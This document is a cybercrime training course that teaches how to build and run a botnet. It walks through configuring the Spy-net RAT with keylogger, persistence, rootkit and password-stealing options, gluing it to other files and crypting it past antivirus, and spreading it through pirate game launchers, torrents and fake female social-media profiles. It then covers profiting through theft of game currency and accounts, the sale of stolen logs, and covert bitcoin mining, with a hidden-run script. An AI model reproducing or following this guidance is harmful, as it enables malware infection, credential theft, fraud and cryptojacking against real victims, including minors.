AV - antivirus.
Botnet - This is a network of bots. Bots are computers infected by us, whose owners are usually unaware of the infection of their computer. A network is built from these bots, which is controlled by one user, that is, by us. Management takes place through the backdoor admin panel, which can be located both on the hosting and on our computer.
Backdoor - This is our main tool with which we will control other people's computers. Translated as (back door) - "back door" says a lot. In
the first place it is a virus whose purpose is secretly installed on the computer of the victim to control the computer.
Cryptography - In our case, this is the encryption of the backdoor code that makes our virus invisible to security programs such as AV, firewalls, etc.
Cryptography can be performed using a special program (cryptor), or manually.
Joyner - This is a program with which we glue our backdoor with any other file. For example, we have glued our backdoor with an image, so when such a file is launched, the image will open simultaneously and the backdoor will secretly start.
Stub is an important part of the cryptor code. During encryption, according to a certain algorithm, the encrypted file is written as stub resources and saved.
It turns out that the finished encrypted file is the same stub that, during startup, searches the resources for the data that we have encrypted, decrypts and
executes them. Simply put, the stub acts as a shell to protect against AV.
A signature is a set of bytes by which AV determines whether a file is infected or not. It is the change in signatures that makes the virus invisible to AV.
Backdoor creation
Well, now let's get down to creating our backdoor. For this we need Spy-net 2.7 RAT. Spy-net is a client-server program for hidden remote administration. The backdoor will consist of 2 parts - a client and a server. The server will be located on the computers of the victims, and with the help of our client we will manage the machine of our victim. Open Spy-net. Before us is the client part. Let's create a server with which we will manage the computers of the victims. We press START. If the menu is not in English, then we do this:
To create a server, select "File" -> "Create server" A window appeared where we will create our profile. Each profile can have its own settings. We delete all unnecessary profiles. Click on the "New" button and a window for entering a profile appears. You can name your profile whatever you like, it doesn't matter.
We delete all records in the table. We press the "Add" button and a window appears where we must enter the IP and port.
Let's consider this moment in more detail.
IP
Where to get the IP address.
- You can purchase a Dedicated Server and use its IP;
- If you have a static IP you can use your IP;
- If you have a dynamic IP, you can use the No-ip.com service.
No-ip service
(If you decide to use the Dedicated IP or your own, you can skip this
item). Why do we need the No-ip service? This service is used to convert dynamic IP to static using special software of this service. The software synchronizes our IP with specials. domain that we came up with when registering in the service. This domain refers to our IP and when our IP changes, the software synchronizes the new IP with the server. As a result, it turns out that when we change our IP, we will always be available for one domain. The first thing we need to do is register. Go to the site - noip.com
Click on "Sign up now".
We get to the registration page, fill in the fields as usual, login, password, e-mail (better use foreign services - Gmail, yahoo, etc.) Next, enter the name of our domain, the service has free domains only in the noip.biz zone.
We chose a name for the domain, now click under the column "Free DNS" -> "Sign UP".
We receive a confirmation letter on our soap. To activate, follow the link in the letter. Everything is now our account is activated.
Click on the "Download" tab.
Next, "Download Now" Downloaded, run the installer.
We launch the software. We enter our Email and password that we specified during registration.
The software is authorized. Now click on the "Edit Hosts" button.
Select our domain and save by clicking on the "Save" button. If everything is done correctly, it should look like this:
If yours is different, then you need to try to choose another network card. To do this, click "File" -> "Preferences" Under the line "network adapter" select another network card. If, however, there is a red cross on one of the items, then in the same settings under the "IP Detections Method" line, check the "use alternative IP detection method" item.
Ports
After entering the IP, we need to enter the port. A few is better. You can use the standard ports. But for many, the possibly popular ports are closed by the ISP. In order to understand what ports we have open there are several methods.
1. Download and run the DoScan program, it is attached to the course. We need the Express Scan tab, it opens immediately at startup. In the "IP address" field, enter our IP.
Next, in the "Start port" and "End port" fields, specify the port search range.
Let's indicate from 1 to 50,000. I think we don't need any more.
Click on the "Scan" button. After scanning, we get a list of used ports.
Now they need to be checked. We go to the site 2ip.ru In the menu, select the "Port check" tab.
In the field, enter one by one all the ports that DoScan issued to us. If it says that the port is closed, you can immediately filter it out. All open ports must be used.
2. Scanning ports using the site tool - hideme.ru Go to the site, select in the menu "All Tools" then "Port Scanner".
Enter your IP in the field, select popular ports and scan. It is also advisable to check them on the 2ip website.
So, now that we have dealt with IP and ports, let's return to our Spy-net. Enter the IP and port into this window.
It is advisable to enter several ports. Next, we have the Identification and Password fields In the Identification field, enter our ID, you can enter the name of the file to be distributed or your login, this field has no special meaning, just for your convenience. In the Password field, enter the password accordingly.
Next, go to the Installation tab. This tab is used to configure the server installation.
The Install server item is autorun, if you uncheck the box, then after restarting the computer, the server will not start automatically on the victim's computer. Let's take a look at the settings of this tab.
"Installation directory" - defines where our server will be installed locally.
System - folder "С: / WINDOWS / System32 /"
Windows - folder "C: / WINDOWS /"
Root - the root of the boot disk
Program Files - folder "C: / Program Files /"
Other - specify the path manually.
On the right we see the fields "directory" and "File Name"
Directory is the folder where our server will be installed
File name - the name of the file that our server will assign to itself
"Inject into" - this function injects a server process into another process and works on behalf of this process.
No inject - The process takes place without injection.
Default Browser - Injects into the default browser process.
Other - We manually indicate the process in which you want to be introduced.
There are additional options below.
Persistence - this function allows the server to automatically recover when it is detected. For example, if they find and delete a server file, server process, server startup keys, they will be automatically restored.
Hide File - Hides the server file
Change creation date - changes the server creation date
Melt file - self-deletion of the executable file
Mutex - with this function, it excludes the possibility of starting the 2nd copy of the server.
"Boot" - the registry keys are indicated here, it is possible to start our server.
We're done with this tab. Let's go further.
Message Tab
This function is intended to display an error window when the victim starts the server.
Here you can select the error icon, title and text. In our case, this function is useless and it will not be useful to us. This feature is only useful when running a bare server. Move on.
Keylogger Tab
This function allows you to record every keystroke on the victim's keyboard. I think that the keylogger is familiar to many.
Under the line "Keylogger settings" we see 2 items:
"Delete [BACKSPACE]" - when the function is selected, the keylogger will remember pressing the
backspace key.
"Send logs bu FTP" - this function allows you to send logs to your FTP server. And below are the individual settings:
Send to - Ftp name = server
Directory - server folder to which logs will be sent
FTP user - ftp server login
FTP password - password from ftp server
Send logs FTP port - port for sending logs
Send each - the period of time after which the logs will be sent.
Of course, it is more convenient that the logs come to FTP. And we move on.
Anti-debug tab
This function protects against starting our server on virtual machines and debug systems. Our server will not start on systems with a check mark.
Naturally, we put the checkboxes everywhere, because we won't have any sense from virtual machines)
Create server tab
So the climax. The final stage. Let's take a closer look at the functions of this tab.
(I recommend setting the settings as in the screenshot).
"Use icon" - applies the selected icon to the server. We put a tick and an icon appears on the left . If you click on it, you can select an icon from the list to choose from.
We will not need this function, because we will still glue our server with another file.
"Compress with UPX" - after creating the server, it is compressed by the file packer - UPX
"USB Spreader" - Distribution via USB stick. If the victim inserts a flash drive, the server will automatically write its copy to it in stealth mode.
"p2p Spreader" - Spread through p2p networks like DC ++
"RootKit" - masking the server and its process in memory.
"Google Chrome Password" - steals passwords from the Google Chrome browser.
"Bind files" - Joyner. With it, we can glue our server with any other file.
Click "Bind files" and glue them with the file we need.
A window for gluing appears, in the "File" field we select the file we need.
Click on the "Add" button, the file appears in the list, put a check mark.
Leave all other parameters unchanged.
Click on "Create server" And create our server.
If everything went well, a window will appear that asks us "Do we want to save the current settings", you can save the settings.
Now, to make sure that we did everything correctly and everything works for us, it is advisable to check our server on yourself.
It is best to create a server that we will run on a virtual machine, for this, when creating a server in the "Anti-debug" tab, we uncheck all the boxes, or run it on our machine and when creating a server in the "Installation" tab, uncheck the "Install server ", so our server will be deleted after reboot.
Further, it is VERY IMPORTANT, in the client itself, select "options" -> "select listening ports".
A window opens where we register all the ports that we specified when creating the server.
We also enter the password that we specified when creating the profile, save it. Now we are starting our server, an ominous laugh is heard (I advise you to turn it off, because when a new bot suddenly connects, many will be frightened of surprise) and we appear in the client line.
By right-clicking on our bot, that is, we see a list of control functions. The list is quite large and varied, so we will analyze the management in a separate manual that you have attached, and we go further.
Backdoor encryption
We have a backdoor, but this is not enough. So far, there is no sense from it, because not a single antivirus program and firewall will miss it. It is not worth hoping that the victim has all the protection completely disabled. What do we do?
In order for our backdor to be invisible to security programs, we need to encrypt it from them, that is, encrypt it.
How it's done?
There are 2 ways:
We will not plunge into the jungle of manual cryptography, because at first we do not really need it and it will take a lot of time, and as you know, time is money.
We will consider the programmatic method of encryption.
Cryptors
There are public and private cryptors. We will look at public cryptors.
A cryptor is a program that automatically encrypts the file we have selected.
Perhaps the most important part of each cryptor is the stub (you can read what a stub is on the first page).
The beauty of public cryptors is that they are free.
But the fact is that the stub consists of signatures and it is by the AB signatures that it determines the infection of the file.
The more time the cryptor is in the public domain, the more people will use its stub and thus the signatures will get into the databases faster. Simply put, viruses encrypted with a public cryptor do not live very long, but they will do well for a few days.
But you can still extend the life of public cryptors, or rather their stubs, by cleaning signatures. True, here we need the skills of manual cryptography. If someone wants to learn, then you can search for information on the Internet, since there are a lot of it and just manuals and video lessons. If we start to touch upon the methods of manual encryption and, having begun to study them, then many beginners will simply have their brains filled with information. this is pure programming and further reading of the course will be simply difficult, given how much information lies ahead.
Plus, manual encryption is a very lengthy process, because signatures are calculated by the brute force method, and each of your selections must be checked for falsity.
If you use a cryptor and most AVs are burning your backdoor, then instead of manual encryption, you can use the method of combining stubs. That is, we encrypted the
file and encrypt it again with another cryptor or stub. You can combine as much as you want, the main thing is to check for paleness every time and look at the changes. If no changes are observed, then crypt in the reverse order or use other cryptors.
How can we test our encrypted backdoor for faintness?
One AV will not be enough, because this is not an indicator. "Taste and color ..." Well, you get the idea, and that's why everyone uses different ABs. Do not install all AVs in turn and check! There are special services for this:
- virusscan.jotti.org (22 AV, free)
- chk4me.com (25 AV, free)
- file2scan.net (35 AV, 10 $ per month)
- elementscanner.com (35 AV, shareware)
- fullscanner.net (35 AV, 9 $)
P. S: NEVER use Virus Total (
www.virustotal.com) for checks, even if this is not the final version of the virus or you will not use it, the signatures will get into the AV databases and any encrypted file with such a cryptor will be fired the next day.
Naked backdoor no crypto
Glued and encrypted backdoor using public cryptors by combining.
Where can we get public cryptors?
One of the best options, in my opinion, is the Spanish forum - indetectables.net/viewforum.php?f=7
In the section - "Nuevos Troyanos y Herramientas" fresh cryptors are posted every day.
But the only disadvantage for newbies will be the "antiinub" system. (It is also a plus, because although the cryptors are public, not all of them will be able to use them)
Some passwords to the archives are encrypted and this site will help to decrypt them - crypo.in.ua/tools/. There are also special programs.
Hints are attached to such encrypted passwords - abbreviations of cryptographic algorithms and languages, or software with which the password is decrypted.
Also, most likely not all public cryptors will start for you, because some of them are written using libraries that not every user has. This will be indicated by an error message of the form "COMCTL32.OCX library not found". But this is not a problem, because you just need to download the file of the required library and register it via cmd. How to do this, you can read in more detail on the Internet, because the settings for different versions of windows and bit systems are different. You can find out which library you need from the error message.
[
In the future, I advise you to purchase a private cryptor, because it saves our time, nerves and money very well . Of course, you can also master manual encryption, it will be much cheaper than purchasing a cryptor, but one manual encryption can take you more than one hour. What would you manage to do during this time? I think a lot of things, but the cryptor will do it in 1 second and with a clean result.
Their cost varies from $ 15 to infinity. Decent cryptors cost from $ 150. A big plus of such cryptors is that they are updated almost every day.
Crypt services
If you are too lazy to mess with cryptors and you have a small budget, then the easiest option for you is to use a crypt service. Usually, all crypt services crypt at 0, that is, no matter what AB did not burn the threat. There are many such services, but not all of them provide high-quality services (and some do not provide them at all, but simply disappear with your money)
Verified crypt services:
1. Icq: 309994 - $ 10-15 per file. One of the cheapest crypt services with a controversial reputation. Personally, I did not have any problems, if something was wrong, I
returned the money.
2. Jabber:
[email protected] - $ 20 per file. For the price-quality best service.
3. Jabber:
[email protected] - price depends on the file. I worked with him for a long time, everything was always at its best, but lately he rarely happens to be on the net.
4. Jabber:
[email protected] - $ 40 per file. I worked with him before, everything was fine. Now the price is quite high.
Before encrypting, tell the seller on what basis the backdoor is and what it is glued to. After encryption, also check if the file is pale, and if it starts at all. In otherwise require recript or refund.
Algorithm of actions
1. Create our backdoor and glue it with the file under which we will distribute, preferably with an .exe file.
2. We crypt the resulting glued backdoor.
3. Checking the backdoor on AV databases
4. Distributing
5. Profit
6. Do not forget to update the backdoor at least once a week.
As a result, we get an .exe file that is not fired by most AVs and launches our backdoor in stealth mode.
Important Tips
1. The already glued backdoor with the executable file (software / game) should be encrypted.
If you do the opposite, then there is a possibility that the backdoor will be fired due to gluing.
2. After gluing and encrypting, check the launch of the file on yourself. It happens that gluing or encrypting the file can damage the file, and it will stop running. In such
cases, it should be re-scripted or glued with another joiner.
3. The backdoor should be updated at least once a week, ideally once a day (if you want good results, update every 1-2 days)! An update is a re-encrypted backdoor. After a while, the backdoor starts to fire AV and whatever this happens, our bots need to update the backdoor every time.
It is very easy to update. We create a new server (backdoor) with the same parameters that we distributed, or we take a bare server file (without gluing) that we have already distributed or re-script it.
Next, select all bots in the spy-net client, select the item - "Send file and --- Runhidden"
Legalization
Perhaps this concept is incompatible with a botnet, but I will try to convince you.
The point is to force the user to voluntarily install our backdoor, and this is done using an agreement with which he agrees.
Running a little ahead, I will say that one of the distribution methods will be through the installation files. Almost every isaller has a license agreement.
It is these license agreements that we will need to edit.
The change will concern notifying the user that third-party software will be installed on his computer, the installation of which he must consent to. Who reads our license agreements? That's right, no one and naturally he will give his consent.
Now everything is in order.
We have an installation file with which we will glue our backdoor. Before glueing it to the backdoor, we need to edit the license agreement. This can be done manually, and if we distribute the file through the owner of the installation file, then it is better to ask him directly.
What exactly to edit and where depends on the clauses of the license agreement.
It is advisable to implement our addition somewhere in the middle of the agreement, so that it would not be very conspicuous. The text must be designed in an official business style, must comply with the clause in the agreement and notify the user that he agrees to install our backdoor.
Examples:
The user is hereby notified and agrees that when using the "program", if necessary, a third party will administer the user's PC remotely to perform the necessary tasks.
By using the "program" you agree that additional software will be installed on your computer , which will allow a third party to remotely administer your computer.
This text is usually used under the clauses "General provisions" or "Terms of use".
The text is given as an example, composing your own is not difficult.
The main thing is to indicate that the user agrees / is notified / consecrated that any actions will be performed with his computer using third-party software by a
third party, although you can probably indicate the "copyright holder" because no one will then figure out who is the copyright holder and who is the third face.
It all depends on what product you need to edit the agreement and what functions you will use.
You can write more vaguely, but I do not advise.
Now let's see how we can create our own installation file with a license agreement.
For this we need a well-known compiler - Smart Install Maker. Let's say we need to create our own installation file for some software.
We open our compiler. The first thing we see in the "Information" menu is where we fill in the fields according to the software itself and choose the path to save the installation file itself. Next, we need the "Files" menu, find a shortcut with the name "Add files from folder" in the lower right menu, find the folder with our software and select it. All files from the folder will be automatically transferred to the compiler.
Next, go to the "Dialogues" menu. In the general tab, in principle, you can leave everything as it is. We are interested in the "License / Information" tab. We put a tick in the box "Show the license agreement" and select the path to the file with the agreement (if you do not have a license agreement yet, you can download it or copy it into a text file and edit it).
In the "Interface" menu, select and customize the design for our installer.
The rest of the menus are not necessary for us to create a regular installation file.
In the top menu we find a shortcut with the name "Compile", click and our installer is ready.
The program is very clear and easy to use, with the help of it you can make your own repacks (RePack - pirates) for games and installation files for various programs
(I advise you to study in more detail this compiler for creating repacks).
Spread
How you distribute your backdoor will determine how efficiently your botnet grows.
There are a lot of backdoor distribution options, we will consider several of them.
1. Distribution through game launchers.
Of course, we can glue our backdoor with the game and scatter it across forums and other platforms, but believe me, this will not bring the expected result, and at the same time you will waste a lot of time.
Why do we need to distribute downloads, impose them on users when the user himself finds our file and downloads it.
I'm talking about distributing pirated game servers or programs through websites.
At the moment, there are a large number of multiplayer games on the network, and there are even more pirate servers for these games. And most of the administrators of such servers are schoolchildren, which should play into our hands.
I recommend that you start your search with games like - Minecraft, CS, Lineage 2, WoW, Aion. Almost every pirate server of these games has its own launcher, there are a lot of servers for these games and they are growing every day.
Where to begin
The first thing we need to do is select the game servers with which we will glue our backdoor. It is advisable to approach the choice with some criteria:
- the server has its own launcher;
- good server popularity;
- small age administrator.
The bottom line will be to agree with the server admin about gluing our backdoor with the launcher of their game.
Take the game Minecraft, for example. We find the site of a server for this game and write to the administrator that we have a business proposal for him. It's better not to write what we need right away, let him answer better. If he doesn't answer, then he is not interested in money)
As a result, we have to offer the admin for a reward (usually $ 10-20) to allow us to glue our backdoor with the launcher. Naturally, it is better to say that this is,
for example, a script for cheating something, anyway it will not see or recognize what we are gluing the launcher with. If there is a license agreement in the launcher, then please edit it so that everything is consistent among the players, you and the admin. We give him our text with edits in the agreement, as a rule, editing for him
will not be difficult.
Admins can get caught different, someone will refuse, someone will ask for more money, someone will think for a long time, but if the administrator is a student and it comes to money, then they usually agree and they are not even interested in what you have there for the "script".
You can agree on payment in a month, there have been such cases, in any case, in a month you will have already assembled a good network, which will pay off the monthly payments, with the help of which your network is increasing.
Personally, I had very good performance from Minecraft servers. There were from 10 to 200 downloads from one server per day. And there were several such servers.
Another important point is that our backdoor must be clean for all popular antivirus programs such as Kaspersky, NOD, Avast, Dr.Web, Norton, McAfee, Panda, AVG, Avira, Emsisoft, etc. Ideally, it should be 100% clean. T. to a few cries of users that there a virus can alert the admin and other players. And we have nothing to do with such a pale.
It is also necessary to re-encrypt our backdoor once a week and glue it to the launcher, otherwise the backdoor will soon start firing the security programs.
Discuss this moment with the administrator.
Spreading the backdoor through games is effective and cost-effective in terms of the fact that the computers of gamers are powerful enough, which is important, for example, in such a direction as bitcoin mining.
2. Distribution through game bot programs
As well as pirate servers, there are a lot of different bots for these games.
Why bots? It's simple, here our prey will be the accounts from the official game servers, which we will talk about a little later. For those unfamiliar with multiplayer games, a bot is a program that performs any action in the game in an automatic mode, that is, without the participation of the player. For example, collecting valuable things, leveling a character, trading at an auction, etc. Simply put, bots are used to automatically earn game currency, and as you know, this currency has value only on off servers. That is why most of them use bots on off servers.
I recommend using bots for games like WoW, Aion, Lineage 2, Gueld Wars 2, Diablo III.
We will look for the creators of these bots or resource administrators who
distribute public / hacked versions of these bots.
Finding these resources is not difficult, you just need to enter in a search engine, for example, "
WoW bot ".
The communication scheme is the same as in the first version.
The contact is mainly made by resource administrators who distribute these bots in free access, because the income from their resources is not great, but here at least some kind of reward. But the bot developer has money from his sales, so they are often not interested in such offers, but still I managed to negotiate with some of them.
One of the advantages of this distribution option is that when using and downloading bots, many disable all security programs because almost all of them
regard bots as malware. But this does not mean that it is not necessary to encrypt our backdoor!
3. Distribution via torrent trackers
Yes, surely many of you know about this method or have thought of it yourself.
But it will not be superfluous to mention this method.
The backdoor will be distributed again through games.
The first thing we need to do is to monitor the game market and identify the next game releases.
Take the famous GTA V.
There are 2 options for development:
1. We create our own repack, glue it with a backdoor and put it on torrents a day
release release. To do this, we need to have a key and a game license. that is, pre-order it. We will not waste time telling you how to make your own repack, for this you can use smart install maker, besides, the Internet is full of guides and video tutorials.
2. Download the ready-made repack and distribute it with our backdoor to trackers. So of
course it's easier, you don't need to buy a game, you don't need to waste time creating a repack. But you will waste time downloading the repack, which plays a big role during the release. It happens that the distribution hangs for a couple of hours, and then it is removed at the request of the copyright holders, but not from all trackers. Here, luck will smile at you. It is also important to update our distribution once a week, that is, to glue the repack with the newly encrypted backdoor. Otherwise, after 1-2 weeks, our repack with the backdoor will slowly begin to fire with security programs, users will start yelling into chats and your distribution will be shut down.
4. Distribution through questionnaires
The method is as old as my great-grandmother.
I want to warn you right away that by this method we will receive low-quality bots, but they will do quite well for buildup.
The bottom line is to attract lustful users (and there are many of them) to our profile pages and force them to download the file with our backdoor.
We go to Facebook or any other social network.
We register girls' profiles. We post seductive photos, it is possible in underwear, but without nudity. We make a more or less realistic profile, no need
to post photos of top models, famous personalities or porn actresses.
We start promoting the pages. We send photos of the girls of our profiles to popular dating groups, and write under the photos something like “get to know a boy”,
“boys add”, etc. That is, we need to interest the men so that they go to our page. You can send messages using special programs.
Next, we need to force the download of our backdoor file.
We will distribute under the guise of an archive with erotic photographs of a girl from our profile. The archive can be filled with left erotic photos, but it will be
suspicious, so we put a password on the archive and give everyone the wrong password. And you can also erotic photos of a girl from our profile, but
it is very difficult to find ordinary photos of a pretty girl and then her erotic photos. But it is possible, and this can help us - pornolab.net/forum/viewforum.php?f=1728
In general, we create an archive with a photo and glue it to our backdoor.
Further, under the photos in the questionnaire, we place a link to our archive, or in the status we write something like “New pictures from my erotic photoset in my links” and place our link to the archive in the “links” section.
Let's pay attention to the link. If you upload our archive to any known file hosting service, then the contact personally will block all such links. Therefore,
it is advisable to do a clean redirect (redirect).
For this we go to nic.reg3.ru, (or to any other site selling domains).
We register, buy the cheapest domain zones. After that, our domain appears in our list. Click on it and we go to the domain management menu. We find the line "setting the zone and redirection" under it we see a small menu, where we put a dot in the item "Redirect to the site" and enter our link where we will redirect from this domain, for example zalil.ru/123456
As a result, we get a fingerless link that redirects the user to the file hosting service to download our archive.
For example, in the links we have "myphotosession.rf" clicking on it the user goes to the file sharing site "zalil.ru" where he can download our archive.
Monetization
Now we have a versatile and very effective tool for making money online. Consider some types of botnet monetization.
Sale of game currency and accounts
Many game accounts on official servers are of some value,
namely:
- The character itself. The value depends on the level of the character;
- Game currency.
Sale of game currency.
The method is quite routine and not very stable, but I started with it. With 10-20 downloads per day of my backdoor, I received from 1k rubles to 10k rubles per day. It depends more on how lucky you are with your account.
Probably one of the most important points is to determine the game in which we will specialize, of course, you can not focus on one game, but take everything
that fell into our "pocket", but this is very inconvenient, turn it!
To simplify the search for the accounts we need and expand the circle of our "clients", we choose the distribution method through bots. Naturally, we will use a
bot for the game we chose.
Using this method, we will sell in game currency.
To begin with, I recommend to monitor the market and see the currency of which game is the most expensive. Quite an expensive exchange rate for the currency of games such as Rift and Guild Wars 2, but personally, I recommend working all the same on WoW, because the population of this game is very large, and, accordingly, the demand for currency.
The bottom line will be to go to the victim's account and redirect the game funds either to your account, or to the service account to which we are selling currency.
Consider both options:
1. We sell currency to large services for the sale of currency, they constantly need suppliers. First of all, we need to monitor these services again and
see who buys the currency more expensive than others. Prices will be lower than they sell and differ among services of a few rubles, and maybe even kopecks; in case of large transactions, even a couple of kopecks will bring a significant increase.
2. Sell the currency directly to the buyer. Instead of selling currency to huckster services at 2 or even 3 times cheaper, you can sell it immediately to players. This method requires more time, but we will earn at least 2 times more.
To do this, it is desirable for us to have several characters on each of the servers of this game. These characters will serve as a piggy bank for our currency.
Or, you can simply record the victim's account, the amount of money on the account and the server. Thus, transfer money to the player immediately from the victim's account, but the disadvantage here is that when the victim is playing, we will not be able to enter, and therefore, we will not be able to transfer the game currency at any time.
The very transfer of this currency within the game also plays a big role.
Some of the most common methods are through auction, guild, or trade.
Here are some examples:
Auction. We go to the account of our victim and look at the amount of money on the account, remember. Next, we go to our piggy bank character, go to the auction and place some small change, the cost, which will be equal to the amount that is on the account of our victim. Everything, posted. Again we go to the account of our victim, go to the auction and buy the thing that was placed with the help of the piggy bank character. Now all the money has flowed to our character.
Guild. We go to the victim's account and leave the guild, unless of course he is a member of the guild. Next, from our piggy bank character, we create a guild and invite the victim's character there . Again we go to the victim's account, join the guild and replenish its account with all the means of the victim.
The most important! So that the victim does not suspect too much, remember where the character stood when entering the game and when exiting, try to return him to the same place. The advantages of this method are that the victim does not understand where his money went and blames it on a game bug, which minimizes the risk of suspicion of “malware”. In the end, this is a game and the loss of game money is much less upsetting than the loss of a game account
Stealing game accounts.
This method is a little easier to implement and does not take a lot of time.
To begin with, we also need to choose a game on which we will work.
I recommend choosing the most famous and most populous games such as Wow, Aion, Lineage 2, WoT.
You already know how to distribute the backdoor. Next, we begin to collect the fruits.
Install the game client and view the accounts of our victims. It is advisable to install the client on a grandfather or virtual machine using a proxy or VPN.
We are interested in accounts whose levels have reached more than half of the maximum level (for example, the maximum level is 80, which means we select accounts whose levels are more than 40). The higher the level, the more expensive the account.
It is desirable to sell at a lower price, because it is important for us to sell as quickly as possible.
For sales, you can use special intermediary services, but they have a number of disadvantages, for example, some ask to confirm passport data, although
this is not a problem - to confirm the left data, but an extra stamp.
But there are also services that post your ads without any checks.
You can also sell in the most usual way, spreading an advertisement for the sale of a character on social networks, on game forums, message boards, in any case, the buyer will find you, it's a matter of time. The more ads, the faster you can sell.
There are several pitfalls here:
1. Before selling an account, you need to change the password from the victim's account, from the mailbox and postpone it for a week. If, at the same time, during this period the victim has not restored access, then most likely he cannot do this, or he simply does not care about the account. We can sell such accounts with minimal risk that the victim will regain access.
(If you do not have a drop of conscience, then some might think of selling right away, changing the password beforehand before selling, but in this way there is a chance that the victim will restore access and thus our client who paid money for the account will lose it. I strongly advise against doing this . !)
2. After changing the password, the victim may suspect that something was wrong and start to scan his computer for our "malware" in most cases, their
attempts will be in vain, but you never know how deep it will bury itself and there is a chance that the victim will decide to reinstall Windows, which is guaranteed to destroy our backdoor on his PC.
3. Checks from the side of the dripper. The checks are different and more sophisticated each time. They check the last IP visits, ask to send photos of passports with
registration and with your handwritten receipt. Of course, most of them are easily dispensed with, but such buyers are usually very petty. Personally, I didn't even spend time on such.
Sale of logs and accounts
This is perhaps the most common type of botnet activity.
For those who don’t know, the log is a text file containing detailed information about every action of our victim. Simply put, all the information that our keylogger or stealer collects.
Logs can be sold as they are, that is, in the form in which they come to you on the ftp-server, or you can make a selection in the logs. Each method pays off well, but each has its own pros and cons.
Sale of pure logs.
The bottom line is to sell the logs that come to us on ftp. You can't think of anything easier, the only thing that is required of us is to select the required size of the log file before selling . The price depends on the size of the log file and the quality of the logs. The quality depends on what the logs were taken with. Logs taken by a keylogger are much cheaper than logs taken by a stealer or grabber.
The keylogger collects all the information (necessary and unnecessary), where he went, what he wrote, i.e. a lot of garbage and unnecessary information. The buyer is
mainly interested only in accounts and billing information.
A stealer or grabber collects and steals from browsers only passwords and logins from various resources. This option is convenient for us and for our customers, there is no need to dig in the logs to select accounts.
Now let's talk about the price.
The main criteria affecting the price of logs:
1. With the help of which the logs were removed. As already mentioned above, logs from a keylogger are of lower quality, therefore they are cheaper than logs taken by a stealer or grabber.
2. Country of logs. Or rather, the number of countries from which the logs were removed. For example, if the logs contain only information from users of one country (for example, Russia), then such logs are more expensive. If the logs contain information about users from different countries, then such logs are called Mix and, accordingly, are cheaper.
3. Check logs. Logs that were not used are more expensive than the logs in which they dug and collected all the cream. Although it is more a matter of your conscience.
The average price for 1MB of logs from a keylogger is $ 0.1-0.15.
The average price for 100 kb of logs from a stealer or grabber is $ 2-5.
Selling individual accounts.
If you do not feel sorry for your time, then you can dig in the logs and dig up a lot of interesting things. Twist your time will pay off.
As in the first option, logs can be sold but with a sample (it costs even more), that is, the buyer needs the accounts of a certain site. It is better to search for them in
your database using a special checker. But in this case, your base becomes use and minted.
But instead of waiting for a client who asks for a sample, you can check your base on the accounts of the most common resources and submit an advertisement for the sale of accounts of certain sites. Turn some accounts in a single copy cost more than your entire base.
The most valuable accounts of such resources as - mailers, social networks, Internet auctions, e-wallets, game servers, site and server admins, various forums (mostly closed forums or forums for earning where reputation and registration date are valued)
Most bought accounts:
- Google.com (mail, social network, channel);
- Webmoney.ru (Mini);
- Vk.com;
- Facebook.com;
- Odnoklassniki.ru;
- Instagram.com;
- Twitter.com;
- Ebay.com;
Administrators of sites are also well bought, and accounts of carding, hacker, spam forums are especially closed. On such sites, the registration date and
reputation are very valuable, and some of them simply cannot be accessed. But people from such forums are searched and accounts of these systems come across very rarely.
IMPORTANT POINT: Before selling accounts, review them manually, sometimes you come across very valuable accounts, especially on social networks. For example,
accounts of administrators of large groups or accounts with a large number of friends and subscriptions. I think very few people will be able to use such accounts to their advantage
Bitcoin mining
Many of you have a great idea of what bitcoins are and how to get them. But since the course is focused on beginners and they probably are present, it will not be superfluous to mention what it is.
Bitcoin (bitcoin) is a digital currency (cryptocurrency). Bitcoins are mined using a client program that, at the expense of computer resources, calculates the headers of the hashes of the blocks, at the expense of which bitcoins are given. For the generation of one block, 25 coins are given. The mining of bitcoins itself is called "mining" which in translation means mining or mining / mining.
Bitcoin mining compares well to the miner's craft. Miners (i.e. we) are miners, and bitcoins are ore (let's say gold). It is difficult for one to mine ore, so miners are united in groups (pools) where all mining is distributed equally among the workers. And the deeper we dig the mine, the more difficult it is to extract ore, plus every day we have more competitors who also came to extract the same ore, which by the way is not endless.
But you and I are not some miners who work day and night to get the coveted penny for our work. For our purpose, we will recruit several hundred, and maybe thousands of slaves who will do our "dirty work" absolutely free! First of all, we need to decide on the client with which we will mine through our bots. There are plenty of such programs, but in my opinion it is preferable to use Phoenix 2.0.0.
This program is attached to the course, and you can download it here - bitcointalk.org/index.php?topic=75786
Downloaded, now we run the file phoenix.exe and we have the file phoenix.cfg. This is the configuration file for our miner. We open it.
We need to register the mining parameters in it. They should look like this:
[general]
autodetect = + cl –cpu
backend = http: // user @ host : port
backups = http: // user @ host : port
logfile = log
[cl: 0: 0]
autoconfigure = true
aggression = 5
The line "autodetect" indicates with what we will mine.
You can mine in 2 ways - using the CPU (Processor) and GPU (Video card). As a rule, video cards have better performance, so we specify the "cl" parameter, which just denotes the video card.
The strings "backend" and "backups" indicate the addresses of the pool, the main (backend) and backup (backups). We need to replace the values http: // user @ host : port with your address in the pool.
Everything under the line [cl: 0: 0] refers to the graphics parameters that assign the load on the video card / processor. The "aggression" line sets the speed at which our video card or processor will mine. The higher the speed, the higher the load. I do not recommend setting the "aggression" parameter more than 5, otherwise our victims will understand that something is wrong with their computers due to the heavy and frequent load on their video cards. We figured out the settings. Next, we need to select the pool through which we will mine.
In short, a pool is a server where many users unite who simultaneously generate a block, after which the reward is distributed equally among all participants in the process.
I personally recommend the 50btc.com pool for many reasons. I think almost everyone who mines or tried to mine in Russia uses it.
Other popular pools:
- mining.bitcoin.cz
- deepbit.net
- bitminter.com
- btcguild.com
- btcmine.com
We register in it and get the address that we enter into the file phoenix.cfg in the lines "backend" and "backups". Here's an example of how it should look:
That is, the backup addresses in the 50btc pool that should be in the backups stock look like this - pool2.50btc.com and pool-us.50btc.com.
The miner is set up and ready to go! Now we need to install it to our victims.
The first way.
This method will take a lot of time because this operation will need to be applied to each bot individually.
We open our Spy-net. Select the bot, right-click on it and select the very first item - "file manager".
The file manager opens. Above, select the item% WIN% and we go to the Windows folder. (You can select any folder, it is important that the user does not find your folder with the miner).
Right-click on any folder in the file manager and select the "Create folder" item and create a folder. The folder can be called whatever is convenient for you, the main thing is that it is not a stupid set of letters with numbers. Click Refresh.
Now we fill in the miner files into our folder, for this we right-click and
select the "Send file" item. The miner is now on the victim's computer. It remains to be done so that it starts automatically in hidden mode.
To do this, we need to create a script and register it in the registry. This is done simply. Create a txt file and write 2 lines there
var WSHShell = WScript.CreateObject ("WScript.Shell");
WSHShell.Run ("filename", 0);
